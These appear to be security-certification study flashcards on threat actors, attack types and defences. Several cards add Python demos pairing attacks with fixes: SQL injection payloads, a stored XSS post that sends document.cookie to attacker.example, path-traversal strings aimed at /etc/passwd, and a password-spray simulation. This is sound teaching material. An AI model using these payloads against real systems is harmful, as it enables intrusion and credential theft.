Chapter 2 Flashcards

(112 cards)

1
Q

Threat actor

A

Any person or group who presents a security risk

2
Q

Nation-state actors

A

Highly skilled, highly funded government-sponsored attackers

3
Q

Hacktivist

A

Attacks for ideological or political reasons; can be quite sophisticated despite having few resources and little funding

4
Q

Unskilled attacker (script kiddie)

A

Attackers with little skill and little funding, typically running tools and exploits written by others

5
Q

Insider threat

A

Many resources, medium sophistication. An employee or contractor acting out of revenge or for financial gain who uses their knowledge of the organization to know exactly which vulnerable systems to hit.

6
Q

Organized crime

A

highly funded, highly sophisticated, motivated by money

7
Q

Shadow IT

A

Many resources, low sophistication. A department or group that does not want to deal with the IT department's rules and so circumvents existing IT controls (buying its own cloud services, for example), leaving unmanaged systems the organization does not know about.

8
Q

Threat vector

A

The method or path an attacker uses to gain access to a victim's machine or network

9
Q

Agentless

A

Threat vector through software that runs without being installed, such as a web-based application executed in the browser

10
Q

Client-based

A

Threat vector through software that must be installed on the device; think installed malware or a compromised application

11
Q

Unsupported systems

A

Outdated operating systems or applications no longer supported by the manufacturer; no patches will be released for newly found vulnerabilities

12
Q

WEP, WPA, WPA2, WPA3

A

Wireless security protocols used to encrypt wireless traffic. WEP and the original WPA are broken and should not be used; WPA3 is the most secure and current.

13
Q

802.1X

A

Port-based network access control. The switch port or wireless association stays closed to everything except authentication traffic until the user or device presents valid credentials (checked via EAP, usually against a RADIUS server). Works on wired and wireless networks.

14
Q

Bluetooth

A

Attackers can use Bluetooth for reconnaissance, e.g. discovering nearby devices and tracking a target's location

15
Q

TCP

A

Transmission Control Protocol. A connection-oriented transport-layer protocol, not a port: ports are the 16-bit numbers that identify services within TCP or UDP. Usually written as TCP/IP.

16
Q

UDP

A

User Datagram Protocol. A connectionless transport-layer protocol with no delivery guarantees. Like TCP it uses port numbers, but it is a protocol, not a port.

17
Q

Open port vector

A

Every listening service is an entry point, so an open port is an opportunity for an attacker. Could be due to a misconfiguration (a service exposed that should not be) or a vulnerability in the listening service.

18
Q

Default credentials

A

Devices ship with default usernames and passwords that are publicly documented; if they are not changed, it is very easy for attackers to gain access

19
Q

MSP

A

Managed service provider

20
Q

Supply chain vector

A

An attacker gains access to a network through a vendor or supplier. Think of the 2013 Target credit card breach, which started with a compromised HVAC vendor's credentials, and counterfeit Cisco hardware being delivered to customers.

21
Q

Phishing

A

Social engineering, usually delivered by email or SMS. The grammar, spacing or URL is usually not quite right. Creates a sense of urgency to get the victim to click a malicious link.

22
Q

Business Email Compromise (BEC)

A

Attacker impersonates a trusted business contact (an executive, a supplier, a partner) by email to trick the victim into making a payment or sending sensitive data

23
Q

BEC

A

Business Email Compromise

24
Q

Pretexting

A

Lying to obtain information, often by inventing a story (the pretext) that makes the request seem legitimate.

25
Typosquatting
An attacker registers a domain name with a common misspelling of an existing URL
26
Vishing
Voice phishing over the phone
27
Smishing
SMS phishing
28
Watering Hole attack
An attack directed at a specific group: the attacker compromises a third-party website the group is known to visit (the website of the sandwich shop near the office, for example) and plants malicious code there, waiting for the targets to arrive.
29
DLL
Dynamic Link Library. A Windows library containing data and code.
30
Malware
Malicious software. To do anything it has to be loaded into memory, either as its own process or by injecting itself into a legitimate running process.
31
Memory Injection
Malware injecting its code into an existing process. The injected code runs with that process's rights and permissions and can read its data; if the target process is privileged this is effectively a privilege escalation, and the malware also hides behind a legitimate process name.
32
DLL injection
Attacker writes the path of a malicious DLL (Dynamic Link Library) into a target process's memory and forces that process to load it (on Windows, classically by creating a remote thread that calls LoadLibrary), so the attacker's code runs inside the legitimate process.
33
Buffer overflow attack
Attacker writes more data into a memory buffer than it can hold, spilling over into adjacent memory. Overwriting neighbouring variables or a function's return address lets the attacker change what the program does or run their own code with the privileges of the vulnerable program.
34
Race condition
A programming flaw that occurs when two threads or processes access the same resource at the same time and the outcome depends on which one gets there first. The first one to access the resource wins, which can produce inconsistent or exploitable results.
35
TOCTOU (Time-of-Check to Time-of-Use)
A race condition between checking a condition and acting on it. Analogy: you check your bank balance at home, then go grocery shopping; by the time you pay, the balance may have changed, but you act on the stale check.
36
TOCTOU
Time-of-Check to Time-of-Use
37
OS
Operating system
38
SQL
Structured Query Language. The standard language for querying and managing relational databases
38
Malicious update
A fake update used to introduce malicious functionality
39
SQLi
SQL injection
40
SQL injection
An attacker enters SQL syntax into an input field so that the database executes it. In a login form built by string concatenation, entering ' OR '1'='1 as the password makes the WHERE clause always true, so the query matches every row and the attacker bypasses authentication or dumps the table. Defence: parameterised queries, never concatenating user input into SQL.
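The login bypass described on this card, as an added example that is not part of the original flashcards. It builds a small in-memory SQLite table (the users and passwords are constructed for the demo) and runs the same login check two ways: concatenated, which the ' OR '1'='1 payload and the comment payload alice'-- both defeat, and parameterised, which treats the payload as plain data.

```python
import sqlite3

# Constructed sample data for this example only
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: user input becomes part of the SQL grammar
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    # Parameterised query: input is bound as data and cannot change the grammar
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# Classic tautology payload: the WHERE clause becomes (... AND password='') OR '1'='1'
TAUTOLOGY = "' OR '1'='1"
# Comment payload: everything after -- is ignored, so the password check disappears
COMMENT_USER = "alice'--"


def demo():
    conn = make_db()
    return {
        # every row comes back: authentication bypassed for "all users"
        "vulnerable_tautology": login_vulnerable(conn, "x", TAUTOLOGY),
        # log in as a chosen user without knowing the password
        "vulnerable_comment": login_vulnerable(conn, COMMENT_USER, "wrong"),
        # the same payloads against the parameterised query match nothing
        "safe_tautology": login_safe(conn, "x", TAUTOLOGY),
        "safe_comment": login_safe(conn, COMMENT_USER, "wrong"),
    }
```

Run demo() to see the two results side by side; the only difference between the vulnerable and safe functions is whether the input is part of the SQL string or bound as a parameter.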
41
XSS
Cross-site scripting
42
Cross-site Scripting
Attacker sends the victim a crafted link to a legitimate website. The site reflects the attacker's script into the page it returns, and the script runs in the victim's browser with access to that site's session and data.
43
Vulnerable XSS website
Website whose search feature echoes the search term into the page without encoding it, allowing an attacker to inject JavaScript that steals information from whoever opens the link
44
Persistent (stored) XSS attack
Attacker posts a message containing malicious script on a social media site or forum. The site stores it and serves it to every visitor, so anyone who views the page runs the script without clicking anything special.
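The stored (persistent) XSS from cards 42 to 44 and its fix, as an added example that is not part of the original flashcards. The posts are constructed for the demo; the attacker's post carries a script that would send the viewer's cookie to an assumed host, attacker.example. The same stored posts are rendered once with raw concatenation and once with output encoding (html.escape), which is the control that stops the script from executing.

```python
import html

# Constructed message-board content: two normal posts and two attacker posts
POSTS = [
    "Great article, thanks!",
    # would ship every viewer's session cookie to the attacker (hypothetical host)
    "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
    # the same idea without a <script> tag: an event handler on a broken image
    '<img src=x onerror="alert(document.domain)">',
    "See you at the meetup <3",
]


def render_unsafe(posts):
    # Raw concatenation: whatever was stored is served as live HTML to every visitor
    return "".join(f"<div class='post'>{p}</div>" for p in posts)


def render_safe(posts):
    # Output encoding: <, >, &, " and ' become entities, so the browser shows the
    # attacker's text instead of executing it
    return "".join(f"<div class='post'>{html.escape(p, quote=True)}</div>" for p in posts)


def page_has_live_tags(page):
    # Demo-only check: a raw < followed by a tag name means markup survived unencoded
    lowered = page.lower()
    return "<script" in lowered or "<img" in lowered
```

Encoding at render time is what matters: the malicious post is still in the database either way, but only render_unsafe turns it into something the browser will run.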
45
Internet of things (IoT) devices hardware vulnerabilities
Stove, refrigerator, garage door opener, could potentially connect to network and become vulnerable to attack
46
IoT
Internet of Things
47
Firmware
The software embedded in a hardware device that acts as its operating system. Usually only the manufacturer can fix it, and updates can be slow or manual; think surgical/medical devices that need a vendor rep to update them.
48
EOL
End of Life
49
End of life
Manufacturer stops making product
50
EOSL
End of service life
51
End of service life
Manufacturer no longer provides technical support with patches, etc
52
Legacy devices
Devices still in use after EOL/EOSL. Since they can no longer be patched, you may want to add firewall rules or segmentation to restrict what can reach them and what they can reach.
53
VM
Virtual machine
54
Virtual machine
Largely same capabilities and security practices apply as physical machines
55
Virtual machine escape
Attacker breaks out of a guest VM and interacts with the hypervisor or host operating system, which gives access to every other VM on that host and the data within.
55
Resource Reuse
Data from one VM inadvertently becoming readable by another because memory or storage is reallocated between VMs without being cleared first.
56
Jailbreaking/rooting
User or attacker gaining root/administrator access on a mobile device, often by installing custom firmware, circumventing the built-in security controls. A mobile device manager can no longer enforce policy on a rooted or jailbroken device.
57
MDM
Mobile device manager/management
58
Sideloading
Apps installed manually without app store
59
Virus
Malware that can reproduce itself through running a program, etc
60
Fileless virus
Stealthy virus that is never written to disk as a file; it runs only in memory, often by abusing built-in tools such as PowerShell, which makes it hard for file-based antivirus to detect.
61
Ransomware
Encrypts all your data and holds it hostage, usually offering the key in exchange for money
62
Worm
Malware that self-replicates without any intervention, uses the network as a transmission medium, (don't need to run a program or anything)
63
Spyware
Malware that spies on you, usually for identity theft purposes- can include keylogging technology and browser monitoring
64
Bloatware
Apps installed on a new device, often by the manufacturer, that you don't need, and take up valuable storage space. Can be difficult to remove
65
Keyloggers
Software that can capture keystrokes, such as passwords, email info, URLs, private messaging. May also store other information such as screenshots
66
Trojan Horse
A type of malware that downloads on to your computer disguised as a legitimate program
67
Logic bomb
Waits for a specific date or event to "go off"
67
Rootkit
Hides itself in the core of the operating system. It runs as part of the kernel alongside the core operating system files, so it can conceal its own files and processes from tools running on that system, making it very difficult to detect.
69
Brute force physical attack
Literally breaking down doors to achieve a goal
70
RFID
Radio Frequency Identification
71
RFID (Radio Frequency Identification) cloning
Cloning key fobs and employee access cards by reading the tag's identifier and writing it to a blank tag
72
Environmental physical attack
Could attack HVAC system, the operating environment, the power source
73
Denial of service (DoS) attack
Attacker forces a system to fail by overloading it
74
DoS attack
Denial of Service
75
DDoS attack
Distributed Denial of Service
76
Distributed Denial of Service (DDoS) attack
A coordinated attack launching an army of computers to bring down a service by creating a traffic spike using up all the system's bandwidth. Attackers could utilize botnets to achieve this.
77
DNS amplification
Attacker sends small requests to open DNS servers with the source address spoofed to the victim's. Each server sends its much larger response to the victim, so a little attacker bandwidth becomes a flood that overwhelms the target.
78
DNS
Domain name system
79
DNS (Domain Name System) Spoofing/Poisoning
Attacker modifies records on the DNS server or the client's hosts file so that the user is sent to a malicious website instead of the trusted one. Could also be done with an on-path attack that replaces the IP address in a DNS response with the attacker's, so subsequent requests go to the attacker's computer instead of the real server.
80
URL hijacking
same as typosquatting
81
Domain hijacking
Attacker gains control of a domain name (for example by compromising the registrar account) and can change its DNS records, redirecting traffic meant for the systems behind it.
82
Radio Frequency (RF) Jamming
Type of Denial of Service (DoS) attack preventing wireless communication
83
Wireless deauthentication attack
Type of wireless Denial of Service (DoS) attack. The attacker sends forged 802.11 deauthentication frames, which are unauthenticated on networks without protected management frames (802.11w), suddenly disconnecting people from the network they are working on.
84
IEEE 802.1X
Port-based network access control: the switch port or access point stays closed except for authentication traffic until the organization authenticates the user's (or device's) identity and authorizes access, then the port is opened. Wired or wireless.
85
Wireless jamming
Usually reactive jamming, jams only when people try to use the network
86
On path attack
Middleman intercepting conversation in real time to modify information sent
87
ARP poisoning/spoofing
On-path attack on a local subnet. ARP has no authentication, so an attacker can send forged ARP replies claiming the router's (or another system's) IP address maps to the attacker's MAC address; victims then send their traffic through the attacker.
88
On-path browser attack
man in the browser attack. malware or trojan on user device redirects traffic to attacker. Waits for you to login to something like your bank account to obtain valuable information
89
Replay attack/Credential replay
Attacker captures data via a network tap, an on-path position, etc. and later resends it to pose as the victim. Ex: attacker captures a username and hashed password as they are sent to a server and replays the same bytes later (a pass-the-hash style replay). Defended by making every authentication exchange unique: a server-issued challenge (nonce) or timestamp the client must sign, session tokens that expire, and encrypting the exchange with TLS. Salting stored hashes protects against offline cracking, not against replay.
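The defence described on this card, as an added example that is not part of the original flashcards: a challenge-response login where the server issues a fresh random nonce and the client answers with an HMAC over it. A captured (nonce, response) pair is useless afterwards because the nonce is single-use and a new challenge needs a new HMAC. The shared key is a constructed value standing in for a password-derived key; a static scheme, where the client always sends the same hash, is shown alongside for contrast.

```python
import hashlib
import hmac
import secrets

# Constructed shared secret for the demo; in practice derived from the user's password
SHARED_KEY = b"example-shared-key"


class Server:
    """Challenge-response verifier with single-use nonces."""

    def __init__(self, key):
        self.key = key
        self.outstanding = set()  # nonces issued but not yet answered

    def challenge(self):
        nonce = secrets.token_bytes(16)
        self.outstanding.add(nonce)
        return nonce

    def verify(self, nonce, response):
        if nonce not in self.outstanding:
            return False  # unknown or already-consumed nonce: replay or forgery
        self.outstanding.discard(nonce)  # consume it, so the pair cannot be reused
        expected = hmac.new(self.key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def client_respond(key, nonce):
    return hmac.new(key, nonce, hashlib.sha256).digest()


def static_verify(stored_hash, presented_hash):
    # Static scheme: the client sends the same hash every time, so a captured
    # value works forever. Salting changes the stored value, not this property.
    return hmac.compare_digest(stored_hash, presented_hash)


def demo():
    server = Server(SHARED_KEY)
    # Legitimate login; an eavesdropper captures both nonce and response
    nonce = server.challenge()
    captured = client_respond(SHARED_KEY, nonce)
    legit = server.verify(nonce, captured)
    # Attacker replays the captured pair verbatim
    replayed = server.verify(nonce, captured)
    # Attacker sends the captured response to a fresh challenge
    fresh = server.challenge()
    cross = server.verify(fresh, captured)
    # Static scheme for comparison: the captured hash keeps working
    stored = hashlib.sha256(b"salt" + b"hunter2").digest()
    static_replay = static_verify(stored, stored)
    return {"legit": legit, "replayed": replayed, "cross": cross,
            "static_replay": static_replay}
```

The nonce is what ties the response to one exchange; without it (or an equivalent timestamp or session token) the verifier cannot tell a replay from the original.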
90
Spraying attack
Attacker tries the 2-3 most common passwords against many accounts, one password across every account before moving to the next, so that no single account reaches the lockout threshold or sets off alarms
91
brute force password attack
Attacker tries as many passwords and combinations as possible against one account until lockout or success; against a strong password this could take months or longer. Online attempts are throttled by lockout policies; offline attacks on a stolen hash are not.
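The difference between cards 90 and 91, as an added example that is not part of the original flashcards: a simulated directory with an assumed lockout policy of five consecutive failures, a spray that tries three common passwords across every account, and a brute force that hammers one account. The accounts and passwords are constructed for the demo.

```python
from collections import defaultdict

LOCKOUT_THRESHOLD = 5  # assumed policy: lock after 5 consecutive failures


class Directory:
    """Toy authentication service with per-account lockout."""

    def __init__(self, creds):
        self.creds = creds
        self.failures = defaultdict(int)
        self.locked = set()

    def authenticate(self, user, password):
        if user in self.locked:
            return "locked"
        if self.creds.get(user) == password:
            self.failures[user] = 0
            return "success"
        self.failures[user] += 1
        if self.failures[user] >= LOCKOUT_THRESHOLD:
            self.locked.add(user)  # this is the alarm the sprayer wants to avoid
        return "failure"


def password_spray(directory, users, common_passwords):
    # Outer loop over passwords: each account sees at most len(common_passwords) tries
    hits = []
    for pw in common_passwords:
        for user in users:
            if directory.authenticate(user, pw) == "success":
                hits.append((user, pw))
    return hits


def brute_force(directory, user, candidates):
    # One account, many guesses: trips the lockout long before the list is exhausted
    for pw in candidates:
        result = directory.authenticate(user, pw)
        if result == "success":
            return pw
        if result == "locked":
            return None
    return None


def demo():
    users = ["alice", "bob", "carol"]
    creds = {"alice": "Winter2024!", "bob": "q7$Lm2#vP!xR", "carol": "Password1"}
    common = ["Password1", "Winter2024!", "Welcome1"]
    sprayed = Directory(creds)
    spray_hits = password_spray(sprayed, users, common)
    hammered = Directory(creds)
    bf_result = brute_force(hammered, "bob", [f"pass{i}" for i in range(100)])
    return {"spray_hits": spray_hits, "spray_locked": sorted(sprayed.locked),
            "bf_result": bf_result, "bf_locked": sorted(hammered.locked)}
```

The spray compromises two accounts without locking any, because three tries per account stays under the threshold; the brute force locks its target after five failures and never gets a chance at the remaining guesses. Detection of spraying therefore has to look across accounts (many users failing with the same password in a short window) rather than at one account's counter.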
92
Malicious code
could be packaged in an executable, scripts running in system, viruses, worms, trojan horses, etc
93
Privilege escalation
attacker accessing regular user's credentials and gaining access to administrator rights or higher-level access
94
Cross site request forgery (XSRF, CSRF, sea-surf)
Session riding. Attacker impersonates user and makes requests to server that user did not make. Such as independently posting to your facebook page when you're logged into FB
95
XSRF, CSRF, sea-surf
Cross-site request forgery, session riding
96
Directory traversal/path traversal
Aims to access files and directories stored outside the web root folder by manipulating parameters that reference files, using "dot-dot-slash" (../) sequences, often URL-encoded (..%2F) to slip past naive filters.
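A check for the traversal described on this card, as an added example that is not part of the original flashcards. It decodes the requested path once, joins it to an assumed web root (/var/www/html), normalises the dot-dot segments lexically, and only accepts the result if it is still inside the root; it also rejects embedded null bytes, which older runtimes used to truncate filenames. The paths are handled with posixpath so the example behaves the same on any platform.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root for the example


def resolve_request_path(requested, web_root=WEB_ROOT):
    """Map a URL path onto the filesystem; return None if it escapes web_root."""
    decoded = unquote(requested)  # decode once so ..%2F is seen as ../
    if "\x00" in decoded:
        return None  # null byte: classic trick to cut off an enforced extension
    # Treat the request as relative to the root even if it starts with "/"
    joined = posixpath.join(web_root, decoded.lstrip("/"))
    # Collapse "." and ".." lexically, e.g. /var/www/html/../../etc/passwd -> /etc/passwd
    full = posixpath.normpath(joined)
    inside = full == web_root or full.startswith(web_root + "/")
    return full if inside else None


def classify(requests):
    # Convenience for the demo: map each request to its resolved path or None
    return {r: resolve_request_path(r) for r in requests}


# Constructed sample requests, benign and malicious
SAMPLE_REQUESTS = [
    "docs/index.html",
    "docs/../index.html",
    "/images/logo.png",
    "../../etc/passwd",
    "..%2F..%2F..%2Fetc%2Fpasswd",
    "%2e%2e/%2e%2e/etc/shadow",
    "index.html%00.jpg",
]
```

This is a lexical check, so it says nothing about symlinks inside the web root; on a real server, follow it up with os.path.realpath on the resolved path and repeat the prefix comparison. Double-encoded input (%252e) decodes to the literal text %2e and stays inside the root here, which is only safe if nothing downstream decodes it a second time.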
97
Birthday attack
Attacker finds two different inputs with the same hash (a collision). Because of the birthday paradox, a collision in an n-bit hash is expected after only about 2^(n/2) attempts, far fewer than the 2^n needed to match one specific hash value.
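The 2^(n/2) claim on this card worked through, as an added example that is not part of the original flashcards. SHA-256 is truncated to 24 bits to stand in for a weak hash; the search hashes numbered messages and stops at the first repeat, which happens after roughly 5,000 hashes rather than the 16 million a single-target search would need. The formulas for the expected attempt count and the collision probability are standard birthday-paradox approximations.

```python
import hashlib
import math


def truncated_hash(msg: bytes, bits: int) -> int:
    # Keep only the low `bits` bits of SHA-256 to simulate a short, weak hash
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") & ((1 << bits) - 1)


def find_collision(bits: int = 24):
    """Birthday search: hash distinct messages until two share a truncated hash.

    Returns (message_a, message_b, attempts). Memory grows with attempts, which is
    the usual space/time trade-off of a naive birthday attack.
    """
    seen = {}
    attempts = 0
    while True:
        msg = f"msg-{attempts}".encode()
        attempts += 1
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, attempts
        seen[h] = msg


def expected_attempts(bits: int) -> float:
    # Expected number of hashes before the first collision: about sqrt(pi/2 * 2^bits)
    return math.sqrt(math.pi / 2 * 2 ** bits)


def collision_probability(n: int, space: int) -> float:
    # P(at least one duplicate among n draws from `space` values), 1 - e^(-n(n-1)/2N)
    return 1 - math.exp(-n * (n - 1) / (2 * space))


def preimage_attempts(bits: int) -> int:
    # For contrast: matching one specific value takes about 2^bits tries
    return 2 ** bits
```

The classic 23-people-in-a-room figure drops out of collision_probability(23, 365); swapping 365 for 2^bits gives the same curve for a hash, which is why a 64-bit digest offers only about 32 bits of collision resistance.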
98
downgrade attack
Forcing a user or system onto weaker security than it supports. Example: SSL stripping, where an on-path attacker intercepts the connection and serves the site to the user over plain HTTP, so the user sends their data without the protection of HTTPS.
99
Segmentation
Separating systems into isolated network zones for performance or security, so a compromise in one zone cannot reach the others directly. Ex: VLANs, physically separate networks, firewall-enforced zones
100
PCI
Payment card industry
101
ACL
Access control list
102
Access control list (ACL)
access control list, could be grouped by user type, user function, IP address, etc. for higher security
103
Configuration enforcement
Each time a device connects, a posture assessment is performed to mitigate risk. If systems are too out of date, company may require system to be quarantined/out of commission until updates have been implemented.
104
Decommissioning
remove sensitive data from storage drives before decommissioning equipment, could later recycle or destroy device
105
Endpoint detection and response (EDR)
EDR technology can detect a threat, investigate a threat, and respond by isolating the system, quarantining the system, and rolling back to a previous configuration, no technician input required
106
EDR
Endpoint detection and response
107
API
Application programming interface
108
HIPS (Host -based intrusion prevention system)
Can recognize and block known attacks on each individual device and help secure the operating system. Often built into EDR (Endpoint Detection and Response) or anti-malware software
109
HIPS
Host-based Intrusion Prevention System